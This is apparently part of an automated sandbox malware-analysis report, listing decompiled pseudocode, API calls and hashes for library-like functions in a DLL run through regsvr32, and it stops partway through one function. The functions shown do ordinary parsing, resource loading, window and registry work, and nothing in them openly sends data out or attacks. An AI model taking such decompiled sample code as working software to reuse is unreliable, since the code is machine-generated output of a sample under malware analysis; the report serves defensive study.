Instruction Fuzzy Hash: EF11083678C6226BD7222E65CC04F3E7B69BF41B90F068110FA51D7190D731DC9182D0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4D943 Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E6DA4D943(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __esi, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v264;
				void* __edi;
				signed int _t11;
				signed int _t14;
				void* _t16;
				char _t19;
				signed int _t22;
				intOrPtr _t23;
				signed int* _t35;
				intOrPtr _t36;
				CHAR* _t38;
				signed int _t42;

				_t37 = __esi;
				_t26 = __ebx;
				_t40 = _t42;
				_t11 =  *0x6da82744; // 0x616b45bb
				_v8 = _t11 ^ _t42;
				_t35 = _a8;
				_push(0x100);
				_t33 =  &_v264;
				_push( &_v264);
				_push(_a4);
				_t14 =  *((intOrPtr*)( *__ecx + 0x7c))();
				if(_t14 != 0) {
					_push(__ebx);
					_push(__esi);
					_t38 =  &_v264;
					_t16 = E6DA5DFC3(_v264 & 0x000000ff);
					while(_t16 != 0) {
						_t38 = CharNextA(_t38);
						_t16 = E6DA5DFC3( *_t38 & 0x000000ff);
					}
					_t19 =  *_t38;
					if(_t19 == 0x2b || _t19 == 0x2d) {
						_t38 = CharNextA(_t38);
					}
					_t22 = E6DA5DEEC( *_t38 & 0x000000ff);
					_pop(_t37);
					_pop(_t26);
					if(_t35 != 0) {
						 *_t35 = _t22;
					}
					if(_t22 == 0) {
						goto L4;
					} else {
						_push(0xa);
						_push(0);
						_push( &_v264);
						if(_a12 == 0) {
							_t23 = E6DA5DDF9();
						} else {
							_t23 = E6DA5DDCE();
						}
					}
				} else {
					if(_t35 != 0) {
						 *_t35 =  *_t35 & _t14;
					}
					L4:
					_t23 = 0;
				}
				_pop(_t36);
				return E6DA59DE2(_t23, _t26, _v8 ^ _t40, _t33, _t36, _t37);
			}

0x6da4d943
0x6da4d943
0x6da4d946
0x6da4d94e
0x6da4d955
0x6da4d95b
0x6da4d95e
0x6da4d963
0x6da4d969
0x6da4d96a
0x6da4d96d
0x6da4d972
0x6da4d985
0x6da4d986
0x6da4d988
0x6da4d98e
0x6da4d9a9
0x6da4d99e
0x6da4d9a4
0x6da4d9a4
0x6da4d9ae
0x6da4d9b2
0x6da4d9bb
0x6da4d9bb
0x6da4d9c1
0x6da4d9c7
0x6da4d9c8
0x6da4d9cb
0x6da4d9cd
0x6da4d9cd
0x6da4d9d1
0x00000000
0x6da4d9d3
0x6da4d9d7
0x6da4d9df
0x6da4d9e1
0x6da4d9e2
0x6da4d9eb
0x6da4d9e4
0x6da4d9e4
0x6da4d9e4
0x6da4d9f0
0x6da4d974
0x6da4d976
0x6da4d978
0x6da4d978
0x6da4d97a
0x6da4d97a
0x6da4d97a
0x6da4d9f8
0x6da4d9ff

APIs

CharNextA.USER32(?), ref: 6DA4D99C

Part of subcall function 6DA5DFC3: __ismbcspace_l.LIBCMT ref: 6DA5DFCD

CharNextA.USER32(00000000), ref: 6DA4D9B9
__wcstoi64.LIBCMT ref: 6DA4D9E4
__wcstoui64.LIBCMT ref: 6DA4D9EB

Part of subcall function 6DA5DDF9: strtoxl.LIBCMT ref: 6DA5DE1B

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CharNext$__ismbcspace_l__wcstoi64__wcstoui64strtoxl
String ID:
API String ID: 1826523842-0
Opcode ID: 6653b4b34c9f553c99c85f6c35c76b5fe31826f0d783eee4f083975bde437cff
Instruction ID: b5f48e6888c6486047afd4a922ff62e9f0a0e1f506f61caf334d62d1b315a60a
Opcode Fuzzy Hash: 6653b4b34c9f553c99c85f6c35c76b5fe31826f0d783eee4f083975bde437cff
Instruction Fuzzy Hash: 342124BA50C206EBCF119F798D80BBA77F8AF8A310F158055E694D7142EB74D9C1CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA52752 Relevance: 6.1, APIs: 4, Instructions: 71
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E6DA52752(signed int _a4, signed int _a8, intOrPtr _a12) {
				void* _t15;
				signed int _t17;
				void* _t18;
				void* _t19;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t15;
				}
				_t23 = _a4;
				if((_t23 & 0x00002000) == 0) {
					_t17 = (_t23 & 0x0000ffff) - 8;
					if(_t17 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t17;
					}
					_t18 = _t17 - 1;
					if(_t18 == 0) {
						L13:
						_t17 =  *_t31;
						if(_t17 == 0) {
							goto L17;
						}
						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
						goto L16;
					}
					_t17 = _t18 - 3;
					if(_t17 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t19 = _t17 - 1;
					if(_t19 == 0) {
						goto L13;
					} else {
						_t17 = _t19 - 0x7b;
						if(_t17 == 0) {
							E6DA526DD( &_a8, _a12);
							_t17 = _a8;
							if(_t17 != 0) {
								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
								_t17 = _a8;
								if(_t17 != 0) {
									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
								}
							}
						}
						goto L17;
					}
				}
				_t17 =  *_t31;
				if(_t17 == 0) {
					goto L17;
				} else {
					__imp__#16(_t17);
					goto L16;
				}
			}

0x6da52758
0x6da5275d
0x6da52803
0x6da52803
0x6da52764
0x6da5276d
0x6da52781
0x6da52784
0x6da527da
0x6da527e0
0x6da527e0
0x6da527e3
0x6da527e9
0x6da527fa
0x6da527fa
0x00000000
0x6da52800
0x6da52786
0x6da52787
0x6da527ca
0x6da527ca
0x6da527ce
0x00000000
0x00000000
0x6da527d3
0x00000000
0x6da527d3
0x6da52789
0x6da5278c
0x6da527c2
0x00000000
0x6da527c2
0x6da5278e
0x6da5278f
0x00000000
0x6da52791
0x6da52791
0x6da52794
0x6da5279c
0x6da527a1
0x6da527a6
0x6da527af
0x6da527b2
0x6da527b7
0x6da527bc
0x6da527bc
0x6da527b7
0x6da527a6
0x00000000
0x6da52794
0x6da5278f
0x6da5276f
0x6da52773
0x00000000
0x6da52775
0x6da52776
0x00000000
0x6da52776

APIs

SafeArrayDestroy.OLEAUT32 ref: 6DA52776
CoTaskMemFree.OLE32(?), ref: 6DA527FA

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: ArrayDestroyFreeSafeTask
String ID:
API String ID: 3253174383-0
Opcode ID: 204a6675af9e70e6aa3fda82a2373af1895016631fcb98e500dd53e9a7b2d32b
Instruction ID: 2cdbb0e604cc3ca418707114242612916148a953731c522fc39877c98b2afafe
Opcode Fuzzy Hash: 204a6675af9e70e6aa3fda82a2373af1895016631fcb98e500dd53e9a7b2d32b
Instruction Fuzzy Hash: 56116D391183079BEB29CF75CC88B7677B8FF41751B188418E864DA150CB35E8A1CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6DA47AE4 Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E6DA47AE4(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t24;
				void* _t29;
				void* _t31;
				struct HINSTANCE__* _t33;
				signed int _t35;
				signed int _t36;
				void* _t38;
				signed int* _t41;

				_push(__ecx);
				_push(_t29);
				_t38 = __ecx;
				_t43 =  *((intOrPtr*)(__ecx + 0x58));
				_t41 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t33 =  *(E6DA4984E(_t29, __ecx, _t41, _t43) + 0xc);
					_v8 = LoadResource(_t33, FindResourceA(_t33,  *(_t38 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t41 = LockResource(_v8);
				}
				_t31 = 1;
				if(_t41 != 0) {
					_t36 =  *_t41;
					if(_t41[0] != 0xffff) {
						_t24 = _t41[2] & 0x0000ffff;
						_t35 = _t41[3] & 0x0000ffff;
					} else {
						_t36 = _t41[3];
						_t24 = _t41[4] & 0x0000ffff;
						_t35 = _t41[5] & 0x0000ffff;
					}
					if((_t36 & 0x00001801) != 0 || _t24 != 0 || _t35 != 0) {
						_t31 = 0;
					}
				}
				if( *(_t38 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t31;
			}

0x6da47ae9
0x6da47aea
0x6da47aed
0x6da47aef
0x6da47af6
0x6da47af9
0x6da47afc
0x6da47b03
0x6da47b1a
0x6da47b1a
0x6da47b21
0x6da47b2c
0x6da47b2c
0x6da47b30
0x6da47b33
0x6da47b35
0x6da47b40
0x6da47b4f
0x6da47b53
0x6da47b42
0x6da47b42
0x6da47b45
0x6da47b49
0x6da47b49
0x6da47b5d
0x6da47b69
0x6da47b69
0x6da47b5d
0x6da47b6f
0x6da47b74
0x6da47b74
0x6da47b80

APIs

FindResourceA.KERNEL32 ref: 6DA47B0C
LoadResource.KERNEL32(?,00000000), ref: 6DA47B14
LockResource.KERNEL32(00000000), ref: 6DA47B26
FreeResource.KERNEL32(00000000), ref: 6DA47B74

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 7639522cd843ca05dcb3989fc04cd9d53c1e29d31afea62e3513bbe101589e80
Instruction ID: 5437c4afd2eeafa01bd20a80655148154f167533b5def96cd01925e348c4243e
Opcode Fuzzy Hash: 7639522cd843ca05dcb3989fc04cd9d53c1e29d31afea62e3513bbe101589e80
Instruction Fuzzy Hash: DC11D039908752EBDB109F65C988AB6B7B4FF05316F14C029E94343640EB70ED82C790

Uniqueness

Uniqueness Score: -1.00%

Function 6DA442DB Relevance: 6.1, APIs: 4, Instructions: 59
windowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E6DA442DB(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t44;

				_t44 = __eflags;
				_t31 = __ebx;
				_push(4);
				E6DA5C80D(E6DA6E0EA, __ebx, __edi, __esi);
				_t35 = E6DA3D6AF(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E6DA44281(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E6DA5CBC5( &_a4, 0x6da7cc28);
				asm("int3");
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E6DA4347D(_t36, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}

0x6da442db
0x6da442db
0x6da442db
0x6da442e2
0x6da442ef
0x6da442f1
0x6da442f4
0x6da442f6
0x6da442fb
0x6da442fd
0x6da442fd
0x6da44302
0x6da44305
0x6da44309
0x6da4430c
0x6da44318
0x6da4431d
0x6da44323
0x6da44326
0x6da4432b
0x6da4432d
0x6da4432d
0x6da4434b
0x6da44361
0x6da4436c
0x6da44374
0x6da44374
0x6da4434d
0x6da44350
0x6da44352
0x6da44352
0x6da44377

APIs

__EH_prolog3.LIBCMT ref: 6DA442E2

Part of subcall function 6DA3D6AF: _malloc.LIBCMT ref: 6DA3D6CD

__CxxThrowException@8.LIBCMT ref: 6DA44318
FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,6DA219BD,00000000,00000000,?,?,8007000E,6DA7CC28,00000004,6DA213CC,8007000E,?,6DA219BD), ref: 6DA44343

Part of subcall function 6DA4347D: __cftof.LIBCMT ref: 6DA4348E

LocalFree.KERNEL32(6DA219BD,6DA219BD,8007000E), ref: 6DA4436C

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof_malloc
String ID:
API String ID: 1808948168-0
Opcode ID: d3dc36bb6a6dce04fa62358062468e43ec7bfc298c2ad082c2713837741a7d85
Instruction ID: e81324bbc2cef703b141311a49fe1d1138201e06dd1c8908c1fd64d35a52b863
Opcode Fuzzy Hash: d3dc36bb6a6dce04fa62358062468e43ec7bfc298c2ad082c2713837741a7d85
Instruction Fuzzy Hash: D111917650C249AFDF00DFA4CC54DAD3BA9BB09354F21C529F628CA190D77199908754

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4C5B6 Relevance: 6.1, APIs: 4, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6DA4C5B6(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x6da82744; // 0x616b45bb
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					swprintf( &_v24, 0x10, 0x6da734f0, _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(_t30 + 0x68));
				} else {
					_t30 = E6DA4C56E(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E6DA59DE2(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}

0x6da4c5b6
0x6da4c5be
0x6da4c5c5
0x6da4c5c9
0x6da4c5cd
0x6da4c5d4
0x6da4c5d7
0x6da4c617
0x6da4c628
0x6da4c5d9
0x6da4c5df
0x6da4c5e3
0x6da4c5f1
0x6da4c5f8
0x6da4c5fa
0x6da4c604
0x6da4c604
0x6da4c5e3
0x6da4c63c

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6DA4C5F1
RegCloseKey.ADVAPI32(00000000), ref: 6DA4C5FA
swprintf.LIBCMT ref: 6DA4C617
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 6DA4C628

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
Opcode ID: dd6c568db1ae299d88f14ed8cef3b9a5bfa53f7a9822707cf3230435c1771bde
Instruction ID: 25f5165e9cbb7ca8890f70971b0d222116a55bed09aa86a7e7aa022279c54e93
Opcode Fuzzy Hash: dd6c568db1ae299d88f14ed8cef3b9a5bfa53f7a9822707cf3230435c1771bde
Instruction Fuzzy Hash: 3C01ED76508309BBCB109F258D44FBFB3BCEB4A724F058429FA01A7140EB70E90687A8

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4850A Relevance: 6.1, APIs: 4, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6DA4850A(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				struct HRSRC__* _t25;
				void* _t28;
				intOrPtr* _t34;
				void* _t36;
				intOrPtr _t37;
				struct HINSTANCE__* _t39;

				_push(__ecx);
				_t28 = 0;
				_push(_t36);
				_t34 = __ecx;
				_v8 = 0;
				_t40 = _a8;
				if(_a8 == 0) {
					L4:
					_t37 = _a4;
					_a8 = 1;
					if(_t28 != 0) {
						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
						if(_v8 != 0) {
							FreeResource(_v8);
						}
					}
					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
					}
					_t18 = _a8;
					L10:
					return _t18;
				}
				_t39 =  *(E6DA4984E(0, __ecx, _t36, _t40) + 0xc);
				_t25 = FindResourceA(_t39, _a8, 0xf0);
				if(_t25 == 0) {
					goto L4;
				}
				_t18 = LoadResource(_t39, _t25);
				_v8 = _t18;
				if(_t18 == 0) {
					goto L10;
				}
				_t28 = LockResource(_t18);
				goto L4;
			}

0x6da4850f
0x6da48511
0x6da48513
0x6da48515
0x6da48517
0x6da4851a
0x6da4851d
0x6da48552
0x6da48552
0x6da48555
0x6da4855e
0x6da48570
0x6da48573
0x6da48578
0x6da48578
0x6da48573
0x6da48582
0x6da4858c
0x6da4858c
0x6da48592
0x6da48595
0x6da48599
0x6da48599
0x6da48524
0x6da48530
0x6da48538
0x00000000
0x00000000
0x6da4853c
0x6da48542
0x6da48547
0x00000000
0x00000000
0x6da48550
0x00000000

APIs

FindResourceA.KERNEL32 ref: 6DA48530
LoadResource.KERNEL32(?,00000000), ref: 6DA4853C
LockResource.KERNEL32(00000000), ref: 6DA4854A
FreeResource.KERNEL32(00000000), ref: 6DA48578

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: e043dbd5454b84991f22d84caed45aaebaaf6a1ca8430548ebeb7ecdf13092fd
Instruction ID: 7b7c5a722ac669a666d0a697b5328a5bc5b828eca5cf4d96e0d64e1217eb01fd
Opcode Fuzzy Hash: e043dbd5454b84991f22d84caed45aaebaaf6a1ca8430548ebeb7ecdf13092fd
Instruction Fuzzy Hash: 37113A7A60431AEFDB008FA6D948AAE7BB9FF05311F04C069FA1597250DB71DA40CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DA42308 Relevance: 6.1, APIs: 4, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DA42308(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				struct HWND__* _t14;
				intOrPtr* _t19;
				void* _t20;

				_t21 = __ecx;
				_t19 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x128))() != 0) {
					_t21 = __ecx;
					 *((intOrPtr*)( *__ecx + 0x188))();
				}
				SendMessageA( *(_t19 + 0x20), 0x1f, 0, 0);
				E6DA40F7C(_t19, _t21,  *(_t19 + 0x20), 0x1f, 0, 0, 1, 1);
				_t22 = _t19;
				_t20 = E6DA41A05(_t19, 0);
				if(_t20 == 0) {
					E6DA44898(_t22);
				}
				SendMessageA( *(_t20 + 0x20), 0x1f, 0, 0);
				E6DA40F7C(_t20, _t22,  *(_t20 + 0x20), 0x1f, 0, 0, 1, 1);
				_t14 = GetCapture();
				if(_t14 != 0) {
					return SendMessageA(_t14, 0x1f, 0, 0);
				}
				return _t14;
			}

0x6da42308
0x6da4230c
0x6da42319
0x6da4231d
0x6da4231f
0x6da4231f
0x6da42334
0x6da42341
0x6da42346
0x6da4234d
0x6da42351
0x6da42353
0x6da42353
0x6da4235f
0x6da4236c
0x6da42371
0x6da42379
0x00000000
0x6da42380
0x6da42385

APIs

SendMessageA.USER32 ref: 6DA42334
SendMessageA.USER32 ref: 6DA4235F
GetCapture.USER32 ref: 6DA42371
SendMessageA.USER32 ref: 6DA42380

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: 472de67518353eb6766cb72d27cc14ebc62c35a1d0514a3c796ed93bc8e2080b
Instruction ID: 985aec452ac624091ca644a8e6ee5eb3f1997260c9572402f676cc96b80940d8
Opcode Fuzzy Hash: 472de67518353eb6766cb72d27cc14ebc62c35a1d0514a3c796ed93bc8e2080b
Instruction Fuzzy Hash: 6B0171353582957BDB301F668C8CFAB3E79DBCEB50F164078B7049E0A6CBA18880D620

Uniqueness

Uniqueness Score: -1.00%

Function 6DA49C25 Relevance: 6.1, APIs: 4, Instructions: 54
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E6DA49C25(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr _t27;
				int _t29;
				intOrPtr _t30;
				CHAR* _t32;
				intOrPtr _t33;
				signed int _t37;

				_t27 = __edx;
				_t24 = __ecx;
				_t35 = _t37;
				_t9 =  *0x6da82744; // 0x616b45bb
				_v8 = _t9 ^ _t37;
				_t22 = _a4;
				_t32 = _a8;
				if(_t22 == 0) {
					L2:
					E6DA44898(_t24);
				}
				if(_t32 == 0) {
					goto L2;
				}
				_t29 = lstrlenA(_t32);
				_v264 = 0;
				E6DA5C5A0(_t29,  &_v263, 0, 0xff);
				if(_t29 > 0x100 || GetWindowTextA(_t22,  &_v264, 0x100) != _t29 || lstrcmpA( &_v264, _t32) != 0) {
					_t16 = SetWindowTextA(_t22, _t32);
				}
				_pop(_t30);
				_pop(_t33);
				_pop(_t23);
				return E6DA59DE2(_t16, _t23, _v8 ^ _t35, _t27, _t30, _t33);
			}

0x6da49c25
0x6da49c25
0x6da49c28
0x6da49c30
0x6da49c37
0x6da49c3b
0x6da49c3f
0x6da49c45
0x6da49c47
0x6da49c47
0x6da49c47
0x6da49c4e
0x00000000
0x00000000
0x6da49c5c
0x6da49c67
0x6da49c6e
0x6da49c7d
0x6da49ca6
0x6da49ca6
0x6da49caf
0x6da49cb0
0x6da49cb3
0x6da49cba

APIs

lstrlenA.KERNEL32(?,?,?), ref: 6DA49C51
GetWindowTextA.USER32(00000000,00000000,00000100), ref: 6DA49C88
lstrcmpA.KERNEL32(00000000,?,?,?), ref: 6DA49C9A
SetWindowTextA.USER32(00000000,?), ref: 6DA49CA6

Part of subcall function 6DA44898: __CxxThrowException@8.LIBCMT ref: 6DA448AE

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: TextWindow$Exception@8Throwlstrcmplstrlen
String ID:
API String ID: 577165417-0
Opcode ID: 371301a965f92f40301b807873eddc538b0a572f02c565da4f1efda72c5da096
Instruction ID: 611580e605d860e533fb56b6f7c6c76ac2e6013b903001d98d70bdcee288bc59
Opcode Fuzzy Hash: 371301a965f92f40301b807873eddc538b0a572f02c565da4f1efda72c5da096
Instruction Fuzzy Hash: 6301C4BA6092196FCB109A65CF84BEF77BCEF86341F118065E646D3140DBB1D98587A0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4CAD5 Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E6DA4CAD5(void* __ecx, void* __eflags) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t11;
				int _t13;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t34;

				_push(__ecx);
				_t23 = __ecx;
				if(E6DA3D6AF(__eflags, 0x10) == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E6DA4CAB6(_t9);
				}
				_t11 = GetCurrentProcess();
				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
				_t34 = _t32;
				if(_t13 == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E6DA5677B(_t23, _t30, _t34, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}

0x6da4cada
0x6da4cadf
0x6da4cae9
0x6da4caf6
0x6da4caf6
